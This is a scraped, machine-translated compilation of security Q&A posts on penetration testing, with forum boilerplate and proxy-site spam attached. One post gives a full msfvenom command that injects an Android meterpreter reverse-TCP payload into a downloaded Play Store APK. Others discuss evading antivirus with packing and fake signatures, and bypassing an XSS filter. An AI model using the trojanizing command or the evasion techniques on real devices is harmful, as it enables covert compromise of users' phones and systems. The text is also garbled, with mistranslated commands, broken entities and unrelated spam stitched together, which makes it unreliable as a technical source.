Free / online penetration test tools – Exchange of information security stacks

My employer has used an external consultant for penetration testing in the past, which has been really beneficial for the development team.

Now I am working on a private development and I cannot allow external pentesting. I have started researching some tools online and I have started testing them. Does anyone have experience relying solely on free tools and what do you recommend? How does it compare with the use of a security consultant? I know it won't be that good, but is it really much poorer or do consultants only use very similar tools?

penetration test – MSFVenom No Permissions on infected apk

When injecting payloads into existing apk files, I have noticed that sometimes the permissions written in the AndroidManifest.xml file are not always read.

I would have downloaded a Google Play apk file and then run the following command:

msfvenom -x test.apk -p android / meterpreter / reverse_tcp LHOST = my_host LPORT = my_port -o exploited-test.apk

The following command has worked for the application called "Pixel Dungeon", and the following permission screen appeared as expected:

However, it has not worked in applications such as Kik, b612 camera filter, facebook lite and some others.
I get the following screen when I try it on Kik:

Does it have to do with the fact that these applications are more secure or run on an Android version that uses a different permission model?


Exploded machine: Samsung Galaxy Tab SMT-530
Apktool version: 2.4.0
Metasploit Framework: 5.0.28-dev

I'm not sure of any other version information I can leave to help solve the problem

Web hosting + business penetration tests?

Web hosting + business penetration tests? | Web Hosting Talk

& # 39;);
var sidebar_align = & # 39; right & # 39 ;;
var content_container_margin = parseInt (& # 39; 350px & # 39;);
var sidebar_width = parseInt (& # 39; 330px & # 39;);
// ->

  1. Web hosting + business penetration tests?

    Wanting to start hosting businesses and offer periodic penetration tests for clients' web applications, do you think people would be interested in that "conjunction" of offers?
    I have been working as a systems administrator at the hosting company for 10 years, now working as a penetration tester, so I think about how to combine this knowledge in a positive way. Actually, the pencil tests are quite expensive, my company, in which I work, I usually charge clients $ 1400 per day of testing and it is 4 to 5 days at least. Anyway, for hosting clients, I think it should be included in the monthly hosting price.

Similar threads

  1. Answers: 0

    Last publication: 14-14-2003, 10:58 AM

  2. Answers: 0

    Last publication: 07/15/2003, 07:33 AM

  3. Answers: 0

    Last publication: 07/15/2003, 07:32 a.m.

  4. Answers: 5

    Last publication: 05-02-2003, 09:35 AM

  5. Answers: two

    Last publication: 2/23/2003, 02:28 PM

Publication permissions

  • Your could not post new threads
  • Your could not post answers
  • Your could not post attachments
  • Your could not edit your publications

network: How to perform a security test / revision / penetration test of Ethernet ports?

Stack exchange network

The Stack Exchange network consists of 176 question and answer communities that include Stack Overflow, the largest and most reliable online community for developers to learn, share their knowledge and develop their careers.

Visit Stack Exchange

penetration test: the antivirus and its function in detecting the execution of the payload?

I recently started learning about ethical piracy and penetration testing. Along the way, I am sure that many people learn about these issues in which I have encountered some obstacles. I will not write an essay about my daily life and study schedule because I know that I will simply be super famous and I will not be able to get peace. Or, I'll take everyone to death. So I'm going to cut to the right …

My first question is this:
1) Antivirus software works by means of signature-based detection. Signature-based detection evaluates the elements (perhaps not the correct word?) Based on a large database of known threats. The software carries with it its own digital signature. If this signature for a particular item matches a known signature in the database, it is marked as malicious and the necessary steps are taken.

  • Do AVs depend solely on this method?
  • Let's say, for example, that the malware passes the AV (because its signature is new), is the malware at home and is it dry?
  • Or do things such as behavioral analysis still prevail? Let's say the malware executes known commands or uses known components; Metasploit framework, Empire, etc. The malware has already exceeded the AV in terms of signature-based detection, provided that the malware is clean. Are there other possibilities that other defenses can detect malicious activity?
  • How long does the AV "hang" from a particular executable? Let's say you start scanning it the moment it hits the disk. Okay, it's clean (according to AV), will it approve the executable, decrease its vigilance, increase, put on the white list or ignore?

2) Are binary executables dead in terms of initiating malicious payloads?
– I see many articles about known threats, particularly in the past, where the malicious load was not simply downloaded in executable format and then executed. A payload can, for example, be hidden in a PDF, a Word document and even then, the payload has not yet been executed and is simply downloaded by a Powershell command
– At what moment are binary executable payloads in .exe format useful in a possible attack, in any case? It's obvious to me that AV vendors today dissect and tear many .exe payloads, and rightly so. It is, by far, what I have learned, the most common vector of attack (if it is the correct way to explain it?) And also the oldest and well used. A person downloads a file that he thinks is legitimate, he is not, he sets up a reverse shell, ready. Or, a person downloads a file, believes it is legitimate, is a keylogger, is ready, or a RAT.

I still feel that there is more behind the scenes. The more I have gotten myself into the task of exploiting a Windows-based system (in my own lab environment), the harder and sometimes more messy it can be to simply put the thing on the computer in the first place. I have used hexadecimal editors, UPX, useless dlls aggregates and resources to confuse detection analysis, signed false executables, modified exe templates and yet … I feel something is missing …

Hmmm …
I appreciate comments on this!
Thank you!

penetration test: reverse case that works with kali 2016, but not with kali 2019.2, using Metasploit ms08_067_netapi

I have a Windows XP Home VM unpatched, a Kali 2019.2 VM and an old Kali 2016 VM. By using Metasploit ms08_067_netapi, I can get a reverse shell successfully, but only in the old Kali box.

I am trying to get the same reverse shell in Kali 2019.2, but without success. However, I was able to obtain a meterpreter link shell that runs from the Win XP box to the 2019.2 virtual machine using the same exploit.

I have done the following with iptables to completely erase everything:

sudo iptables -F
sudo iptables -P ENTRADA ACEPTO
sudo iptables -P FORWARD AHEAD
sudo iptables -P OUTPUT OF ACCEPT

But I still can not catch the reverse shell. Metasploit reports.

[ * ] Exploitation completed, but no session was created.

Finally, I was able to capture a reverse shell from the Windows XP machine to the VM 2019.2 by creating an executable file windows / meterpreter / reverse_tcp using msfvenom and running it on the target Win XP machine (and detecting it in the Kali VM 2019.2). using multi / handler), but still I can not get a reverse shell of The ms08_067_netapi of Metasploit.

Any information about this error would be greatly appreciated!

Penetration test – Construction software for the Hackrf.

I want to start using SDR radio devices to do tests. I was doing some research and I came across a device called Hackrf. The problem with this device was that it required the use of the GNU radio and there is no python library available for Hackrf. So my questions are: how could I develop my own version of GNU radio? Is it possible for Python to interconnect with Hackrf and where can I get more information about the concepts behind Hackrf? As a side note, I'm using Kali Linux as my operating system.

Penetration test – How can I execute my JS payload?

Basically, I'm trying to make my JavaScript scripts work, but because of the server-side filters, like htmlspecialchars continue to fail.
Our entry is placed between this code block:

Jagirao : My text goes here June 17 23:30X

How can I inject the code? I have tried several methods of the OWSAP cheat sheet too, but they do not work. The site uses utf-8 charset.

<becomes & lt; and> it becomes & gt; only & # 39; survive

Is it possible to execute js scripts in these circumstances?

penetration test – Nmap Windows 10 OS Detection

Recently, I've been practicing penetration tests and I've stopped trying to use nmap to detect the operating system for a Windows 10 machine.
For the most part, it is not able to identify the machine as Windows 10, but close to guessing is Windows. I've also tried p0f and xprobe2 with no luck.

What else can I use to successfully detect a Windows 10 machine on the network?

* From a blackbox perspective.

Thank you.

Run internal penetration test without touching the active directory

I am part of a penetration testing team and part of my responsibilities for this quarter is the organization of commitments of the red team during the rest of the year.

This quarter, we have received acceptance from all members of the organization, except the active directory teams. They do not want us to run any AD-related attacks beyond the user / passwd. How can we safeguard the active directory environment of our commitment?

I have considered blocking ports 445 and 139 for all exploration / exploitation activities, but I really do not know if that will help, in addition to doing so, it greatly reduces our attack surface.

Please, do not try to explain that this is a bad idea. I know. It's ridiculous. An attacker will never act on a network without attempting to hack the AD. I tried to explain this. The boss does not agree because if we attack the AD, we could shoot him down. But once again, the same point applies. No attacker will do this when they hack us, but whatever. I just need solutions. Thank you.

DreamProxies - Cheapest USA Elite Private Proxies 100 Private Proxies 200 Private Proxies 400 Private Proxies 1000 Private Proxies 2000 Private Proxies - Buy Cheap Private Proxies Buy 50 Private Proxies Buy 100 Private Proxies Buy 200 Private Proxies Buy 500 Private Proxies Buy 1000 Private Proxies Buy 2000 Private Proxies ProxiesLive New Proxy Lists Every Day Proxies123
Proxy Sites Proxy Tunnels Proxy List Working Proxy Sites Hotproxysite Proxy Sites Proxy Sites Anonymous Proxy Anonymous Proxies Proxy Servers Free Proxies Free Proxy List Proxy List Zoxy Proxy List PR liste all proxy sites More Proxies netgofree netgofree Hide-MyIp - The Best Proxy List American Proxy List Web Proxy Submit Proxies Updated Proxy List Updated Proxy List Bypass Proxy Sites Free Proxies List Evolving Critic Business Web Directory Free Proxy List iShortIt MyProxyList Online Proxies Go Proxies Need Proxies PrivateProxies Proxies4MySchool Proxies4Work Free Proxy List Free Proxy Sites ProxyInside Wiksa Proxy Free Proxy List ProxyNoid Proxy List Free Proxy List Proxy Sites Proxy TopList ProxyVille UK Proxy WebProxy List - Listing the best Web Proxies Free Proxy List SchoolProxiesList Stay Anonymous Proxy List The Power Of Ninja Proxy List UNubstruct Free proxy sites Free proxy sites